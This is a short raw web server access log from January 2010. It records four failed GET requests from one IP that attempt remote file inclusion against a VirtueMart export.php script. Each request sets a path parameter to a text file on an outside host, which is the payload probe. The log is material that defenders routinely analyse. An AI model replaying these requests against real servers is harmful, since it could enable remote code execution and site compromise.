67.227.82.174 - - [05/Jan/2010:01:08:53 -0500] "GET /logs/access_log.Q109071900%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
67.227.82.174 - - [05/Jan/2010:01:08:53 -0500] "GET /logs/access_log.Q109071700%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
67.227.82.174 - - [05/Jan/2010:01:08:53 -0500] "GET /logs/error_log.Q109121600%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.227.82.174 - - [05/Jan/2010:01:08:58 -0500] "GET /logs/access_log.Q109100600%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
